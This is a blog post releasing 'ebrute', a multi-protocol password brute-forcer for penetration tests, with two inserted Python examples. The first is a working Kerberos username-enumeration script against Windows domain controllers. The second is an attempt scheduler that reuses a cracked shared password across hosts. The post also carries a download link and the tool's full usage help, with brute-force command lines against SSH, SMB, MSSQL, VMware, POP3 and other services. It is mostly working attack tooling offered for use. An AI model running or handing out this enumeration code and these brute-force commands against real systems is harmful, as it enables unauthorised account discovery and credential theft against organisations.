Tuesday, 6 December 2011

ebrute - service brute-forcer


I thought it was about time I released my service brute-forcer. It does most of what the other brute-forcers do, but it has some features I find essential on pen tests. In particular, I wrote a Kerberos enumeration plugin that validates the existence of user accounts on locked-down Windows 2k/2k3/2k8 domain controllers (no enumeration over null sessions or via RID cycling) without making a single password guess: the KDC answers an AS-REQ for an unknown principal differently from one for a real account, so no password is sent and no failed logon is counted against the account. On a decent server you can validate over a million usernames a minute, and with some clever dictionaries you typically recover around 70% of the domain's user accounts. See the blog post for more details. Key features:

Large protocol support
  • FTP
  • FINGER (used for seeing output e.g. root@ etc.)
  • KERBENUM (Fast username validation without using a password guess against Windows2k/2k3/2k8 Domain Controllers)
  • KERBAUTH (Fast authentication on Domain Controllers)
  • LDAP (nearly as fast as the Kerberos plugins; brute forces domain and non-domain accounts)
  • Local authentication (quick privilege escalation check, approx. 800,000 guesses a minute)
  • MSSQL (raw TDS, ODBC, OLEDB and managed driver support to try and prevent any strange failures)
  • MYSQL
  • Oracle password checking (turns it from a ~4 MB app into a ~80 MB one :-( so this is temporarily out)
  • Oracle SID brute forcing (same ~4 MB to ~80 MB problem, so also temporarily out)
  • POP3
  • POSTGRES
  • Process (shell your own processes and look at the exit code)
  • SMB via the API (LM, NTLM and, more importantly, NTLMv2)
  • SMB via raw packets (LMv2 and NTLMv2 with dictionary/hashes)
  • SMTP (BASIC, cram, NTLM)
  • SNMP (v2 community name support only at the moment)
  • SSH (2 implementations, both seem similar but sometimes one works better than the other)
  • TFTP (brute force valid files)
  • VMWARE (virtual centre and ESX server authentications)
  • VNC
  • WMI (useful if you only have TCP port 135 open)
  • WWW (BASIC, DIGEST, NTLM and more importantly NTLMv2)
  • Also some quick fuzzers: random TCP/UDP data, and random TCP data wrapped in a valid TPKT (RFC 1006) header (the plugins are named tkpt)
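How the KERBENUM plugin can validate usernames without a password guess, as an added example that is not ebrute's own code: a KDC that receives an AS-REQ carrying no pre-authentication data answers KDC_ERR_C_PRINCIPAL_UNKNOWN (6) for a user that does not exist, KDC_ERR_PREAUTH_REQUIRED (25) for one that does, and KDC_ERR_CLIENT_REVOKED (18) for one that exists but is disabled or locked out; an account with pre-auth switched off simply gets an AS-REP. The script builds the AS-REQ with a hand-rolled DER encoder, pulls the error code out of the KRB-ERROR and classifies it. The function names, the sample_krb_error() fixture used for offline testing and the command-line usage are this example's own, and EXAMPLE.LOCAL is a placeholder realm.

```python
"""Kerberos pre-auth user enumeration, the technique behind the KERBENUM plugin.
Added example, not ebrute's own code.  An AS-REQ that carries no pre-auth data
gets KDC_ERR_C_PRINCIPAL_UNKNOWN (6) for a non-existent user, KDC_ERR_PREAUTH_REQUIRED
(25) for a real one and KDC_ERR_CLIENT_REVOKED (18) for a disabled/locked-out one,
all without a password being sent or a bad-password count being touched."""
import os
import socket
import time

KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_CLIENT_REVOKED, KDC_ERR_PREAUTH_REQUIRED = 6, 18, 25
NT_PRINCIPAL, NT_SRV_INST = 1, 2


# --- just enough DER to build an AS-REQ and read a KRB-ERROR -----------------
def der(tag, body):                         # TLV with a raw tag byte
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    ln = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + body

def ctx(n, body): return der(0xA0 | n, body)    # [n] EXPLICIT context tag
def app(n, body): return der(0x60 | n, body)    # [APPLICATION n]
def seq(*items):  return der(0x30, b"".join(items))
def gstring(s):   return der(0x1B, s.encode())  # KerberosString = GeneralString
def integer(v):   return der(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))  # v >= 0

def principal(name_type, *parts):
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*map(gstring, parts))))

def kerberos_time(t):
    return der(0x18, time.strftime("%Y%m%d%H%M%SZ", time.gmtime(t)).encode())

def der_read(buf, pos=0):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def build_as_req(user, realm, nonce=None):
    """AS-REQ for krbtgt/REALM with no padata; realm must be upper case."""
    if nonce is None:
        nonce = int.from_bytes(os.urandom(4), "big") & 0x7FFFFFFF
    options = der(0x03, b"\x00\x40\x80\x00\x10")        # forwardable, renewable, renewable-ok
    body = seq(ctx(0, options),
               ctx(1, principal(NT_PRINCIPAL, user)),
               ctx(2, gstring(realm)),
               ctx(3, principal(NT_SRV_INST, "krbtgt", realm)),
               ctx(5, kerberos_time(time.time() + 86400)),   # till: 24h ahead
               ctx(7, integer(nonce)),
               ctx(8, seq(integer(18), integer(17), integer(23))))   # aes256, aes128, rc4
    return app(10, seq(ctx(1, integer(5)), ctx(2, integer(10)), ctx(4, body)))

def kdc_response_code(msg):
    """KRB-ERROR error-code; 0 for an AS-REP (no pre-auth needed); None otherwise."""
    tag, body, _ = der_read(msg)
    if tag == 0x6B:                              # [APPLICATION 11] AS-REP
        return 0
    if tag != 0x7E:                              # [APPLICATION 30] KRB-ERROR
        return None
    _, body, _ = der_read(body)                  # the KRB-ERROR SEQUENCE
    pos = 0
    while pos < len(body):
        t, v, pos = der_read(body, pos)
        if t == 0xA6:                            # [6] error-code
            return int.from_bytes(der_read(v)[1], "big", signed=True)
    return None

def classify(code):
    return {KDC_ERR_C_PRINCIPAL_UNKNOWN: "invalid",
            KDC_ERR_PREAUTH_REQUIRED: "valid",
            KDC_ERR_CLIENT_REVOKED: "valid (disabled or locked out)",
            0: "valid (no pre-auth required)"}.get(code, f"unknown ({code})")

def probe(kdc, user, realm, timeout=2.0):
    """Send one AS-REQ over UDP/88 (what kerbenum does) and classify the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_as_req(user, realm), (kdc, 88))
        data, _ = s.recvfrom(4096)
    return classify(kdc_response_code(data))

def sample_krb_error(code, realm="EXAMPLE.LOCAL"):
    """Constructed KRB-ERROR (not a capture) so the parser can be exercised offline."""
    return app(30, seq(ctx(0, integer(5)), ctx(1, integer(30)),
                       ctx(4, kerberos_time(0)), ctx(5, integer(0)),
                       ctx(6, integer(code)), ctx(9, gstring(realm)),
                       ctx(10, principal(NT_SRV_INST, "krbtgt", realm))))

if __name__ == "__main__":                   # usage: python kerbenum.py KDC REALM userlist.txt
    import sys
    kdc, realm, userfile = sys.argv[1:4]
    for name in (line.strip() for line in open(userfile)):
        if name:
            print(name, probe(kdc, name, realm))
```

Two caveats a practitioner wants: the realm must be the domain's Kerberos realm in upper case (e.g. CORP.EXAMPLE.COM) or every answer is KDC_ERR_WRONG_REALM (68) rather than a useful verdict; and although none of these probes touches an account's bad-password count, each one is still an AS-REQ the domain controller can audit (event 4768 with the failure code), so the million-a-minute rate quoted above is loud on a monitored domain. KERBENUMTCP does the same exchange over TCP/88, where each message is prefixed with a 4-byte big-endian length.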
Decent feedback
  • Tells you progress each minute with an estimated finish time
  • Pause and resume the job - useful if looking at wireshark or temporarily switching VLANs (p key)
  • Increase and Decrease the threads mid flow (-+ keys)
  • Press any key for instant updates
  • Increase and decrease debug level while it is running (v/b)
  • Says why things are succeeding/failing, i.e. not just that it failed
  • Attempts to tell you if remote auth is even enabled (e.g. mssql, mysql, postgres)
  • Optionally log all output to a file  
Powerful username, password and host inputs
  • read a single user or pass
  • read a users or passes from file
  • prefix a constant onto a username or pass
  • add a constant onto the end of a username or pass
  • set min max lengths for user and pass inputs
  • switch for checking for blank and/or 'joey' (password equals username) passwords
  • input users and passes from a list
  • read a single host
  • read hosts from a file
  • use hosts and services specified from nmap/nessus output
Other bits
  • Shared password optimization (i.e. spread your attempts across hosts sharing the same creds like a local admin pass...)
  • Port scanner built in so just give it a range e.g. 192.168.8.1-254
  • Automatically retries failed attempts up to 5 times
  • Configurable port, SSL options and timeouts (although not all plugins support this at the moment)
  • Save the progress at any time by pressing F12
  • Requires .net framework 2 or above.
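The username/password input expansion (prefix, suffix, min/max length, blank and joey checks), the default of dropping a user after its first success (-d keeps going) and the shared-password optimisation, as an added example that is not ebrute's own code. The scheduler below is one reading of how those fit together: -S is modelled as promoting any password that worked on one host to the front of the queue for the remaining hosts, which is where the saving comes from when a local administrator password is shared. The class and function names, and the three-host sample (10.0.0.1-3 sharing one local administrator password, Winter2011) are this example's own.

```python
"""Attempt scheduling for a service brute-forcer.  Added example, not
ebrute's own code: it models the -up/-us/-uml/-uxl input expansion, the
-n (blank) and -j (joey: password equals username) checks, the default of
dropping a user after its first success (-d keeps going) and one reading of
the -S shared-password optimisation.  Names are this example's own.
"""


def expand(words, prefix="", suffix="", min_len=0, max_len=None):
    """Prefix/suffix and length filters, de-duplicated in first-seen order."""
    out = {}
    for w in words:
        w = f"{prefix}{w}{suffix}"
        if min_len <= len(w) and (max_len is None or len(w) <= max_len):
            out.setdefault(w, None)
    return list(out)


class AttemptScheduler:
    def __init__(self, hosts, users, passwords, shared=False, check_all=False,
                 blank=False, joey=False):
        self.hosts, self.users, self.passwords = list(hosts), list(users), list(passwords)
        self.shared, self.check_all, self.blank, self.joey = shared, check_all, blank, joey
        self.done = set()      # (host, user) pairs already cracked
        self.promoted = []     # passwords that worked somewhere (shared mode only)

    def candidates(self, user):
        """Per-user guess list: cheap checks first, then promoted hits, then the dictionary."""
        cands = []
        if self.blank:
            cands.append("")
        if self.joey:
            cands += [user, user.lower()]
        if self.shared:
            cands += self.promoted
        return list(dict.fromkeys(cands + self.passwords))

    def mark_success(self, host, user, password):
        if not self.check_all:             # default: stop guessing this user on this host
            self.done.add((host, user))
        if self.shared and password not in self.promoted:
            self.promoted.append(password)

    def attempts(self):
        """Yield (host, user, password), host-major so per-host state is simple.
        The candidate list is built when a (host, user) pair starts, so a password
        promoted on host 1 is tried first on host 2."""
        for host in self.hosts:
            for user in self.users:
                for password in self.candidates(user):
                    if (host, user) in self.done:
                        break
                    yield host, user, password


def run(sched, oracle):
    """Drive a scheduler against an authentication oracle; returns (successes, attempts)."""
    successes, count = [], 0
    for host, user, password in sched.attempts():
        count += 1
        if oracle(host, user, password):
            successes.append((host, user, password))
            sched.mark_success(host, user, password)
    return successes, count


# Constructed sample: three hosts that share one local administrator password.
SAMPLE_HOSTS = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]
SAMPLE_PASSWORDS = ["password", "Password1", "Winter2011", "letmein", "changeme"]
SAMPLE_CREDS = {(h, "administrator"): "Winter2011" for h in SAMPLE_HOSTS}


def sample_oracle(host, user, password):
    return SAMPLE_CREDS.get((host, user)) == password


def compare_orderings():
    """Attempts needed against the sample without and with -S: returns (9, 5)."""
    plain = run(AttemptScheduler(SAMPLE_HOSTS, ["administrator"], SAMPLE_PASSWORDS),
                sample_oracle)
    shared = run(AttemptScheduler(SAMPLE_HOSTS, ["administrator"], SAMPLE_PASSWORDS,
                                  shared=True), sample_oracle)
    return plain[1], shared[1]


if __name__ == "__main__":
    print("attempts without -S / with -S:", compare_orderings())
```

Against the sample, the plain ordering walks the dictionary on every host (3 + 3 + 3 attempts) while the shared ordering finds the password once and then needs a single guess per remaining host (3 + 1 + 1). The host-major loop is also the shape to keep when lockout policies matter: everything a single host and account sees is contiguous, so a per-host delay (the -de switch above) or a cap on guesses per account is easy to enforce inside attempts().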
Limitations and future work
  • Loads all the passwords at the start so it's a proper memory hog.
  • Probably a million bugs - just let me know.
Download:
http://www.r00t.tv/p/downloads.html

Details:

C:\tools\dev\br>ebrute.exe
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help
finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.

C:\tools\dev\br>ebrute -rr
ebrute v0.76 - Edward Torkington
  [option list identical to the output above; omitted]

Name:         finger
Description:  Finger enumeration plugin
Extra params: Specify any char to enable fast mode. Warning it can temporarily kill the service!
Examples:     -r finger -P fingerids.txt -h 10.0.0.1

Name:         ftp
Description:  FTP plugin
Extra params: None
Examples:     -r=ftp -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         kerbauth
Description:  Kerberos authentication plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r kerbauth -e shcdomain -u administrator,admin -P passes.txt -h 10.0.0.1

Name:         kerbenum
Description:  Kerberos user enumeration plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         kerbenumtcp
Description:  Kerberos user enumeration plugin (TCP) [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         ldap
Description:  ldap plugin [2k3]
Extra params: The Windows domain (essential for windows auth!)
Examples:     -r=ldap -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8 -e=win2k3r2domain

Name:         lw
Description:  Local Windows plugin
Extra params: None
Examples:     -r=lw -u=administrator -P=c:\passes.txt -h=127.0.0.1 -t=8

Name:         mssql
Description:  MSSQL SQL Server auth plugin (raw!)
Extra params: None
Examples:     -r=mssql -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlodbc
Description:  MSSQL SQL Server auth plugin (ODBC connection)
Extra params: None
Examples:     -r=mssqlodbc -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlole
Description:  MSSQL SQL Server auth plugin (OLEDB Connection)
Extra params: None
Examples:     -r=mssqlole -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlmanaged
Description:  MSSQL SQL Server auth plugin (Managed Code)
Extra params: None
Examples:     -r=mssqlmanaged -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mysql
Description:  MySQL SQL Server auth plugin
Extra params: None
Examples:     -r=mysql -u=root -P=c:\passes.txt -h=10.0.0.1 -t=4

Name:         pop3
Description:  POP3 plugin
Extra params: If IIS, fully qualified domain, e.g. example.com
Examples:     -r pop3 -h 74.125.79.109 -s -u test@gmail.com -P passes.txt

Name:         postgres
Description:  Postgres SQL Server auth plugin
Extra params: None
Examples:     -r=postgres -u=postgres -P=c:\passes.txt -h=10.0.0.1 -j -n -t=4

Name:         process
Description:  External process plugin
Extra params: postiveExitCode:::command .e.g.
Examples:     -e=1:::a.exe -a -u #user# -p #pass# -pn #port# -e #extra#

Name:         smbrawlmv2sh
Description:  SMB Raw LMv2 plugin [prob more XP/Vista/W2K3/W2K8 any LM setting, single host only!]
Extra params: None
Examples:     -r=smbrawlmv2 -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawlmv2mh
Description:  SMB Raw LMv2 plugin (ensures a single thread per host)
Extra params: None
Examples:     -r=smbrawlmv2mh -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawntlmv2mh
Description:  SMB Raw NTLMv2 plugin [no vista/2k8 support + ensures single thread per host]
Extra params: None
Examples:     -r=smbrawntlm2single -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbapilm
Description:  SMB plugin (LM lm=0 compatible with 0,1,2 and 3)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapilm -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlm
Description:  SMB plugin (NTLM lm=2 compatible with 3,4 and 5)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlm -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlmv2
Description:  SMB plugin (NTLM2 lm=5 compatible with 0,1,2,3,4 and 5, supposedly!)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlmv2 -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smtplogin
Description:  SMTP login auth plugin [login is an authentication type like NTLM]
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpcram
Description:  SMTP CRAM-MD5 auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlm
Description:  SMTP NTLM auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlmbasic
Description:  SMTP NTLM/Basic auth plugin [w2k]
Extra params: None
Examples:

Name:         snmp
Description:  SNMP plugin
Extra params: None
Examples:     -r=snmp -P=c:\passes.txt -h=10.0.0.1 -d -t=16

Name:         ssh
Description:  SSH auth plugin
Extra params: None
Examples:     -r=ssh -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         sshalt
Description:  SSH alternate auth plugin, multiple auths/connect - slighly faster for one user
Extra params: None
Examples:     -r=sshalt -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         tcpfuzzerrandom
Description:  TCP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=tcpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkpt
Description:  TKPT plugin
Extra params: None
Examples:     -r=tkpt -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkptrandom
Description:  TKPT random data plugin
Extra params: None
Examples:     -r=tkptrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tftp
Description:  TFTP plugin
Extra params: Optional path prefix, e.g. /etc/  (tip: watch windows firewall)
Examples:     -r=tftp -P=c:\unix_just_files.txt -h=10.0.0.1 -t=16

Name:         udpfuzzerrandom
Description:  UDP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=udpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         vmware
Description:  VMware ESX/VC plugin
Extra params: None
Examples:     -r=vmware -u=root -P=c:\passes.txt -h=10.0.0.1 -s -t=4

Name:         vnc
Description:  VNC plugin
Extra params: None
Examples:

Name:         wmi
Description:  WMI plugin
Extra params: The wmi end point, defaults to \ROOT\CIMV2
Examples:     -r=wmi -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         wwwbasic
Description:  WWW basic auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwbasic -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windowsdomain

Name:         wwwdigest
Description:  WWW digest auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwdigest -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windomain

Name:         wwwntlm
Description:  WWW NTLM auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlm -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e awindomain

Name:         wwwntlmv2
Description:  WWW NTLMv2 auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlmv2 -h 10.9.9.1 -u administrator -p blah -e win2k3r2domain -t 8

  [Keys during tasks list identical to the output above; omitted]
